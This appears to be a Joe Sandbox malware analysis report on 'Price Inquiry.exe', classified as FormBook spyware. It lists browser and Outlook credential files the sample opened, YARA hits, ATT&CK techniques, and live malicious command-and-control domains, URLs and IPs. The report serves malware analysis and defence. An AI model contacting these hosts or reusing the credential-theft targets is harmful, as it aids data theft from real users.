Source: C:\Users\user\Desktop\Price Inquiry.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Price Inquiry.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Price Inquiry.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 4.2.Price Inquiry.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Price Inquiry.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4627716653.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2435065362.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2460854368.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4627610599.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4620677236.0000000000590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2438337305.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4627308589.0000000003750000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\tzutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\tzutil.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 4.2.Price Inquiry.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Price Inquiry.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4627716653.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2435065362.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2460854368.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4627610599.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4620677236.0000000000590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2438337305.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4627308589.0000000003750000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	412 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	412 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Timestomp	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 DLL Side-Loading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
Price Inquiry.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
Price Inquiry.exe	100%	Avira	HEUR/AGEN.1309294
Price Inquiry.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.clientebradesco.online	96.126.123.244	true	true	unknown
yuanda.zhongshengxinyun.com	119.28.49.194	true	true	unknown
anthonyholland.net	84.32.84.32	true	true	unknown
www.personal-loans-jp8.xyz	199.59.243.227	true	true	unknown
www.oxilo.info	162.0.213.94	true	true	unknown
www.redimpact.online	194.58.112.174	true	true	unknown
tkdz666.w.keilao.com	103.144.219.16	true	true	unknown
www.726075.buzz	47.57.185.227	true	true	unknown
natroredirect.natrocdn.com	85.159.66.93	true	true	unknown
www.www00437.email	unknown	unknown	true	unknown
www.farukugurluakdogan.xyz	unknown	unknown	true	unknown
www.siyue.xyz	unknown	unknown	true	unknown
www.cs0724sd92jj.cloud	unknown	unknown	true	unknown
www.anthonyholland.net	unknown	unknown	true	unknown
www.pelus-pijama-pro.shop	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Reputation
http://www.clientebradesco.online/wouj/?ahL=jjndrjuPIn2hz&K29=yWYB/R3wDrDMgv7/2h3mR36Svhbv8gHDqbTO7lKikOEauwAayMxscd89e9z4JUSFkkGyyfBsvTMtsJwN77reSgxnPdmtMD5avihqpJBRdkkD2f8itAXfl8WSacuACOBToGOGQWQ=	true	unknown
http://www.personal-loans-jp8.xyz/slxf/	true	unknown
http://www.anthonyholland.net/rk2p/	true	unknown
http://www.farukugurluakdogan.xyz/mx00/?K29=qileVsN1diZFcCO3Qsw4YZf+VstA9OzPNQ7Oa8/FkrUJR0uYa1wUZggpoqScYraC15jy36uBsEEpRc6ILD1+qn3sxTmn99lW3lhfvmyegl4mHUSFQDpcAgCp0FvLAl8XjhJr2UE=&ahL=jjndrjuPIn2hz	true	unknown
http://www.oxilo.info/ve3g/?K29=OTcOv8w+bCTLwtzbPVHaVBaVlmgm7BOGOBYyNnUD5x742Zgn72+Avt/ao6tsWGE5AAzMA+xeSHuleySgj3Ruf3ZwlqvIEjNxSel8keC2Xwb1w7P8UoRCloIeFUJhKKlSUKrICZ0=&ahL=jjndrjuPIn2hz	true	unknown
http://www.cs0724sd92jj.cloud/tma8/	true	unknown
http://www.clientebradesco.online/wouj/	true	unknown
http://www.oxilo.info/ve3g/	true	unknown
http://www.www00437.email/4qyv/?K29=YhEDIJyIBDBVYSqg/FaaSQqWMygBCOgWZYLNoJq+YB+tZNzGQAjy4s0gWfbYy8w7+pcTl2oQj4oxHqFf55zNlc3DsUGtLEv5hvA87zMOkIiiPi8ruquKn/Z/ppEenRSay39fUXM=&ahL=jjndrjuPIn2hz	true	unknown
http://www.personal-loans-jp8.xyz/slxf/?K29=Mb3F8yBS6AlbUJPyZs3X69r2DqN8IvT5IyZZHGmk1vQlgc6dIBTXJS0PrtljhQmz1YN0gN0Ls4vblXiCECQJDAoigJx9f3iNuz4aYv9eSvskP5VpnyhZJ0QOlFlswaL7d1KBmz8=&ahL=jjndrjuPIn2hz	true	unknown
http://www.www00437.email/4qyv/	true	unknown
http://www.farukugurluakdogan.xyz/mx00/	true	unknown
http://www.726075.buzz/nuiv/	true	unknown
http://www.anthonyholland.net/rk2p/?K29=+pKvT+T6aI4mLrB8VovWrZ9aurXWw1oR3cjAxWZJwguM4Y26gXhm+92mk/Xvsm02xKxFuv5v6XNtx495ochGFgbGl1fBlLTtvoEL4mYbjiJf04cpXMCfMoNuVfdD1R6NV9hbkdA=&ahL=jjndrjuPIn2hz	true	unknown
http://www.726075.buzz/nuiv/?K29=7su7kyuPS/KHUrSSGVu7suWxHYkjtEW9rejMc2pMopiQn27w9XMUnUBYAhg6Q3mcdodvpFC3LruuFA+cjx07DQKRX2SozR9AvDHFrDouFcoiTaEhBB80Fgqmq/5kDH7ol5SPL+Q=&ahL=jjndrjuPIn2hz	true	unknown
http://www.cs0724sd92jj.cloud/tma8/?K29=9LH/tkN2eceTuuLmYHB7mIhvDU5vHmoPFh9uxAKiqHzTpqc2ajrPE0tAvnDw6NiQ6KU66B+DrNfb3y4zDSs+nNVd6Tj8SZ2+7RNw1/qCD+LV8ZMsKDJeBrRvlbyALL5zLd15wyU=&ahL=jjndrjuPIn2hz	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	tzutil.exe, 00000009.00000002.4631952987.00000000079F8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.clientebradesco.online/wouj?gp=1&js=1&uuid=1729002025.0056686924&other_args=eyJ1cmkiOiAiL	tzutil.exe, 00000009.00000002.4629778770.000000000412C000.00000004.10000000.00040000.00000000.sdmp, pfyyryeDyx.exe, 0000000B.00000002.4627580846.0000000003BBC000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://duckduckgo.com/ac/?q=	tzutil.exe, 00000009.00000002.4631952987.00000000079F8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reg.ru	tzutil.exe, 00000009.00000002.4629778770.0000000003AE4000.00000004.10000000.00040000.00000000.sdmp, pfyyryeDyx.exe, 0000000B.00000002.4627580846.0000000003574000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2733010961.0000000011234000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://parking.reg.ru/script/get_domain_data?domain_name=www.redimpact.online&rand=	tzutil.exe, 00000009.00000002.4629778770.0000000003AE4000.00000004.10000000.00040000.00000000.sdmp, pfyyryeDyx.exe, 0000000B.00000002.4627580846.0000000003574000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2733010961.0000000011234000.00000004.80000000.00040000.00000000.sdmp	false		unknown
http://tempuri.org/DataSet1.xsd	Price Inquiry.exe	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tzutil.exe, 00000009.00000002.4631952987.00000000079F8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.reg.ru/domain/new/?utm_source=www.redimpact.online&utm_medium=parking&utm_campaign=s_lan	tzutil.exe, 00000009.00000002.4629778770.0000000003AE4000.00000004.10000000.00040000.00000000.sdmp, pfyyryeDyx.exe, 0000000B.00000002.4627580846.0000000003574000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2733010961.0000000011234000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	tzutil.exe, 00000009.00000002.4631952987.00000000079F8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-	tzutil.exe, 00000009.00000002.4629778770.0000000003AE4000.00000004.10000000.00040000.00000000.sdmp, pfyyryeDyx.exe, 0000000B.00000002.4627580846.0000000003574000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2733010961.0000000011234000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	tzutil.exe, 00000009.00000002.4631952987.00000000079F8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www70.clientebradesco.online/	pfyyryeDyx.exe, 0000000B.00000002.4627580846.0000000003BBC000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	tzutil.exe, 00000009.00000002.4631952987.00000000079F8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com	tzutil.exe, 00000009.00000002.4629778770.0000000003C76000.00000004.10000000.00040000.00000000.sdmp, pfyyryeDyx.exe, 0000000B.00000002.4627580846.0000000003706000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://www.reg.ru/dedicated/?utm_source=www.redimpact.online&utm_medium=parking&utm_campaign=s_land	tzutil.exe, 00000009.00000002.4629778770.0000000003AE4000.00000004.10000000.00040000.00000000.sdmp, pfyyryeDyx.exe, 0000000B.00000002.4627580846.0000000003574000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2733010961.0000000011234000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	tzutil.exe, 00000009.00000002.4631952987.00000000079F8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.farukugurluakdogan.xyz	pfyyryeDyx.exe, 0000000B.00000002.4629908640.0000000005671000.00000040.80000000.00040000.00000000.sdmp	false		unknown
https://www.reg.ru/whois/?check=&dname=www.redimpact.online&reg_source=parking_auto	tzutil.exe, 00000009.00000002.4629778770.0000000003AE4000.00000004.10000000.00040000.00000000.sdmp, pfyyryeDyx.exe, 0000000B.00000002.4627580846.0000000003574000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2733010961.0000000011234000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://www.reg.ru/hosting/?utm_source=www.redimpact.online&utm_medium=parking&utm_campaign=s_land_h	tzutil.exe, 00000009.00000002.4629778770.0000000003AE4000.00000004.10000000.00040000.00000000.sdmp, pfyyryeDyx.exe, 0000000B.00000002.4627580846.0000000003574000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2733010961.0000000011234000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://www.reg.ru/sozdanie-saita/	tzutil.exe, 00000009.00000002.4629778770.0000000003AE4000.00000004.10000000.00040000.00000000.sdmp, pfyyryeDyx.exe, 0000000B.00000002.4627580846.0000000003574000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2733010961.0000000011234000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css	tzutil.exe, 00000009.00000002.4629778770.0000000004906000.00000004.10000000.00040000.00000000.sdmp, pfyyryeDyx.exe, 0000000B.00000002.4627580846.0000000004396000.00000004.00000001.00040000.00000000.sdmp	false		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tzutil.exe, 00000009.00000002.4631952987.00000000079F8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
119.28.49.194	yuanda.zhongshengxinyun.com	China	132203	TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN	true
96.126.123.244	www.clientebradesco.online	United States	63949	LINODE-APLinodeLLCUS	true
103.144.219.16	tkdz666.w.keilao.com	unknown	136933	GIGABITBANK-AS-APGigabitbankGlobalHK	true
162.0.213.94	www.oxilo.info	Canada	35893	ACPCA	true
199.59.243.227	www.personal-loans-jp8.xyz	United States	395082	BODIS-NJUS	true
84.32.84.32	anthonyholland.net	Lithuania	33922	NTT-LT-ASLT	true
47.57.185.227	www.726075.buzz	United States	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true
194.58.112.174	www.redimpact.online	Russian Federation	197695	AS-REGRU	true
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1534143
Start date and time:	2024-10-15 16:17:30 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Price Inquiry.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@9/2@12/9
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 90% Number of executed functions: 90 Number of non-executed functions: 282
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report creation exceeded maximum time and may have missing disassembly code information.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Price Inquiry.exe

Simulations

Behavior and APIs

Time	Type	Description
10:18:34	API Interceptor	2x Sleep call for process: Price Inquiry.exe modified
10:19:38	API Interceptor	9832554x Sleep call for process: tzutil.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
119.28.49.194	3qsTcL9MOT.exe	Get hash	malicious	FormBook	Browse	www.cs0724sd92jj.cloud/tma8/
	BAJFMONYm2.exe	Get hash	malicious	FormBook	Browse	www.cs0724sd92jj.cloud/5hxl/
	Quotation-27-08-24.exe	Get hash	malicious	FormBook	Browse	www.cs0724sd92jj.cloud/dk4s/
	Atlas Copco- WEPCO.exe	Get hash	malicious	FormBook	Browse	www.cs0724sd92jj.cloud/73ru/
96.126.123.244	5h48M0mr7p.exe	Get hash	malicious	FormBook	Browse	www.deta.group/tqug/?t8eH=Bd68RFqHJL7&BZ=GitlGx/svWl5JjemviMm88JmnwbNnU4N/Hp6W/3r67poMo1FIV+e+3IWdWl5Wb58UxYQ+rqEuw==
	firmware.x86_64.elf	Get hash	malicious	Unknown	Browse	96.126.123.244/
	PDPUOIE76867 PDF.exe	Get hash	malicious	FormBook	Browse	www.ethost.biz/he2a/?ZN9Ls=9rCTo2P0wPzDj0p&5jE=Sqr0ctkiCfkZWIRANmieJkMS6dE9bE5sJtvmbV1Awau4hYWKNS85KIfJRPIDPs20rwIR
	#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs	Get hash	malicious	FormBook, GuLoader	Browse	www.meetfactory.biz/o0e7/
	PI #9100679047.exe	Get hash	malicious	FormBook	Browse	www.globaart.world/y9w3/?gLc=Rd0kEi3w/UsPyR/ns4IoBEbTPQw6Ykk7YQBlzeaiAXJDtt0Hjc5C/XJdgA2bVSiIHhGymk8Z/3Fo9QfVjJgiCjFSLC9AcNH2CIw8m8aXvqQScUVb1Ctu2x0=&6fQ=evG0
	Pro#U015bba o Wycena - Strony 4-6.vbs	Get hash	malicious	FormBook, GuLoader	Browse	www.meetfactory.biz/o0e7/
	60a8.scr.exe	Get hash	malicious	FormBook	Browse	www.optime19.com/seij/
	http://gn.net/ds-server/s/noauth/psm/tsp/sign	Get hash	malicious	Unknown	Browse	gn.net/ds-server/s/noauth/psm/tsp/sign?gp=1&js=1&uuid=1707722574.0084551632&other_args=eyJ1cmkiOiAiL2RzLXNlcnZlci9zL25vYXV0aC9wc20vdHNwL3NpZ24iLCAiYXJncyI6ICIiLCAicmVmZXJlciI6ICIiLCAiYWNjZXB0IjogInRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL2F2aWYsaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOCxhcHBsaWNhdGlvbi9zaWduZWQtZXhjaGFuZ2U7dj1iMztxPTAuNyJ9
	vi3VzdBK4R.exe	Get hash	malicious	FormBook	Browse	www.optime19.com/mg0g/?H6e0=JX9bRfLOpqNEOOylJBmFj4p8QIgnv0TR1nhebZtzBw39xumhyI7GOOmZ3KvTtyU7GUZkfEsfAOx+aJi2z4rxbyH3eXrZDr4WEQ==&nBN=u8MPgxf
	Hephthemimer.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.franchisevideography.com/6vse/?-xnABs9=MP4aJTqYC4vQMBtENwlhfMq8DEkCA6FU41CifmM7zlVilMBpP7k0fJAVYKZLDpHGK+bW65bO27W9Q0vaj6/TZG0ALnN1iW9mqQ==&qOxFY=hJ_m
103.144.219.16	3qsTcL9MOT.exe	Get hash	malicious	FormBook	Browse	www.www00437.email/4qyv/
	S04307164.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.wwwhg58a.com/hy08/?1bY=GtxhAHB&kBZhq=lbcQgJYCEUlvoTvl8lO0t+1nQ92BuyTIbkaARF8Lbv9kz9N0Syp1gpb0iavr456+vVOb
	PURCHASING ORDER.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.wwwhg58a.com/hy08/?q4k=lbcQgJYCEUlvoTvl8lO0t+1nQ92BuyTIbkaARF8Lbv9kz9N0Syp1gpb0iZX778C7rQ3KWgrXeg==&3f2pj=9rDXMfLppP84JvX

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
yuanda.zhongshengxinyun.com	3qsTcL9MOT.exe	Get hash	malicious	FormBook	Browse	119.28.49.194
	BAJFMONYm2.exe	Get hash	malicious	FormBook	Browse	119.28.49.194
	Quotation-27-08-24.exe	Get hash	malicious	FormBook	Browse	119.28.49.194
	Atlas Copco- WEPCO.exe	Get hash	malicious	FormBook	Browse	119.28.49.194
www.clientebradesco.online	3qsTcL9MOT.exe	Get hash	malicious	FormBook	Browse	72.14.178.174
	FATURALAR PDF.exe	Get hash	malicious	FormBook	Browse	45.33.18.44
	PROFORMA INVOICE BKS-0121-24-25-JP240604.exe	Get hash	malicious	FormBook	Browse	96.126.123.244
	p4LNUqyKZM.exe	Get hash	malicious	FormBook	Browse	45.33.2.79
	PO_987654345678.exe	Get hash	malicious	FormBook	Browse	198.58.118.167
	INV20240828.exe	Get hash	malicious	FormBook	Browse	45.33.23.183
www.oxilo.info	3qsTcL9MOT.exe	Get hash	malicious	FormBook	Browse	162.0.213.94
www.redimpact.online	3qsTcL9MOT.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	FATURALAR PDF.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	doc330391202408011.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	yyyyyyyy.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	REQST_PRC 410240665_2024.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	REQST_PRC 410240.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	PO 18-3081.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	INVG0088 LHV3495264 BL327291535V.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
	PURCHASE ORDER_330011 SEPTEMBER 2024.exe	Get hash	malicious	FormBook	Browse	194.58.112.174
www.personal-loans-jp8.xyz	3qsTcL9MOT.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	PO76389.exe	Get hash	malicious	FormBook	Browse	199.59.243.226
	SHIPPING DOC MBL+HBL.exe	Get hash	malicious	FormBook	Browse	199.59.243.226
	r9856_7.exe	Get hash	malicious	FormBook	Browse	199.59.243.226
	Quotation-27-08-24.exe	Get hash	malicious	FormBook	Browse	199.59.243.226

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
LINODE-APLinodeLLCUS	https://mayamabraidsweaveslocs.com/jndnnjnjvnjvdnvdnjnjn.html	Get hash	malicious	Unknown	Browse	172.104.32.232
	http://algop.org/	Get hash	malicious	Unknown	Browse	45.79.252.230
	ngiFN17qJ2.exe	Get hash	malicious	Unknown	Browse	198.58.98.151
	ngiFN17qJ2.exe	Get hash	malicious	Unknown	Browse	198.58.98.151
	na.elf	Get hash	malicious	Mirai	Browse	172.105.50.220
	na.elf	Get hash	malicious	Unknown	Browse	172.105.50.220
	na.elf	Get hash	malicious	Unknown	Browse	172.105.50.220
	SecuriteInfo.com.FileRepMalware.22394.21838.exe	Get hash	malicious	Unknown	Browse	50.116.14.45
	na.elf	Get hash	malicious	Unknown	Browse	172.105.203.21
	na.elf	Get hash	malicious	Unknown	Browse	172.105.50.220
ACPCA	NjjLYnPSZr.exe	Get hash	malicious	FormBook	Browse	162.0.213.72
	bSgEe4v0It.elf	Get hash	malicious	Unknown	Browse	162.48.169.211
	3qsTcL9MOT.exe	Get hash	malicious	FormBook	Browse	162.0.213.94
	QmBe2eUtqs.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	9b7dlGj5Gq.exe	Get hash	malicious	FormBook	Browse	162.0.213.72
	z10RFQ-202401.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	http://nbxvavlbbnks0ockyfxgnbxva.feedbackfusion.site/4nbXVA123415bxwz821wfgqkoqbno9030GRUYZVSMVMDWDTG236348/3210Y21	Get hash	malicious	Unknown	Browse	162.55.233.29
	na.elf	Get hash	malicious	Gafgyt	Browse	162.12.110.107
	na.elf	Get hash	malicious	Gafgyt	Browse	162.12.109.237
	na.elf	Get hash	malicious	Gafgyt	Browse	162.12.110.171
